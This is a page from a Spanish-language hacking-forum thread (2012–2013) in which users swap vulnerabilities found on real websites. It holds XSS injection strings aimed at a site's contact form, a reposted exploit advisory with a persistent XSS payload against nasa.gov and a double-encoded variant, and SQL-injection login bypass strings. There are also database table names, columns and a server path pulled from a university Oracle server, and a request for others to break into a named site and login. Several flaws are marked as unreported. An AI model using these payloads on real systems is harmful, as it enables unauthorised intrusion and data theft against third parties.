Página 13 de 14
Re: Reporte de bugs en webs
Publicado: 11 May 2012, 03:40
por Spectretronic
Tiene un XSS
Solo tienes que injectar este codigo
en contacto en firefox brinca la alerta en google chorome no te la brica no es mentira cress que voy perder mi tiempo?
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Re: Reporte de bugs en webs
Publicado: 11 May 2012, 14:24
por deck
te expresas peor q un libro cerrao pero bueno xD
Re: Reporte de bugs en webs
Publicado: 14 May 2012, 00:29
por adwind
Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
Re: Reporte de bugs en webs
Publicado: 07 Jun 2012, 17:21
por s7evin
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
No estoy muy puesto en Java y menos en servlets... pero parece que intenta usar una variable de SESSION que no está definida ('matricula'). Así que para poder inyectar algo, deberías modificar el objeto de sesión, a lo cual mis conocimientos no llegan.. jeje según mi opinión, tal como tu comentas es 'inofensivo'.
Salu2!
Re: Reporte de bugs en webs
Publicado: 07 Jun 2012, 20:15
por KHC
Pues paarte de darte un monton de informacion no le veo problema! Almenos que busques en la misma web donde puedas utilizar los datos para hacer un query!
Re: Reporte de bugs en webs
Publicado: 07 Jun 2012, 23:41
por MichBukana
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD
[Enlace externo eliminado para invitados]
Estuve mirando no solo en esa aplicacion, si no otras en ese servidor. y resulta que tiene una vulnerabilidad,
una inyeccion sql por POST pero parece que filtra las comillas simples poniendote otra seguida
es un servidor oracle y solo pude sacar esto a nivel web:
Oracle, Apache, windows
alumnos_sinconcluir
Matricula,nombre,total,ciclo
V_social
matricula, nombre, division, nombrediv, carrera, nombrecar, iciclo
D:\Archivos de programa\Apache Group\Apache2\htdocs\servicio_social\index.cfm
Salu2!
Re: Reporte de bugs en webs
Publicado: 24 Ago 2012, 01:44
por Ti0Sam
Código: Seleccionar todo
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| NASA.GOV - Cross Site Scripting Persistent |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date : 21-08-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Vendor : NASA
# Category : misc
# URL Vendor : http://www.nasa.gov/
# Tested on : BackTrack 5 r3 - Mozilla Firefox
# Contact : [email protected]
# Website : www.calebbucker.blogspot.com
# Greetings to : CL-Security All Members
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
http://img341.imageshack.us/img341/4395/snapshot408.png
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
VULNERABILITY LOCATION:
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CROSS SITE SCRIPTING:
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
HOW TO USE:
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
so double encoded it will look like this:
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Enjoy!
# 1337day.com [2012-08-22]
Re: Reporte de bugs en webs
Publicado: 03 Sep 2012, 13:39
por Skillmax
Gracias, hace tiempo saqué uno también.
Re: Reporte de bugs en webs
Publicado: 07 Sep 2012, 12:01
por s7evin
Juder... que buena TioSam/CalebBucker xD
Estos de la Nasa no aprenden ni a base de tortas
Re: Reporte de bugs en webs
Publicado: 07 Sep 2012, 12:28
por deck
cale cada dia me dejas mas sorprendido
Re: Reporte de bugs en webs
Publicado: 02 Oct 2012, 18:56
por Ti0Sam
Como quedan los gilipollas que hablan tras las espaldas
[Enlace externo eliminado para invitados]
Re: Reporte de bugs en webs
Publicado: 02 Oct 2012, 22:46
por sanko
Ti0Sam escribió:Como quedan los gilipollas que hablan tras las espaldas
[Enlace externo eliminado para invitados]
h4x0r...
Re: Reporte de bugs en webs
Publicado: 04 Nov 2012, 01:33
por 15chQ1u
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
user: ' or '1'='1' -- '
pass: ' or '1'='1' -- '
Re: Reporte de bugs en webs
Publicado: 13 Dic 2012, 05:31
por AssaSsins`
hola amigos ustedes que son buenos para estas cosas, que podrian hacer con esta web: [Enlace externo eliminado para invitados]
Y este login: [Enlace externo eliminado para invitados]
Gracias de antemano a todos los que le intenten meter mano a esto se les agradeceria enormemente, gracias amigos
Re: Reporte de bugs en webs
Publicado: 15 Feb 2013, 12:14
por deck
Web : [Enlace externo eliminado para invitados]
Error : [Enlace externo eliminado para invitados]
Método Utilizado : XSS
Descubridor : Deck
No Reportado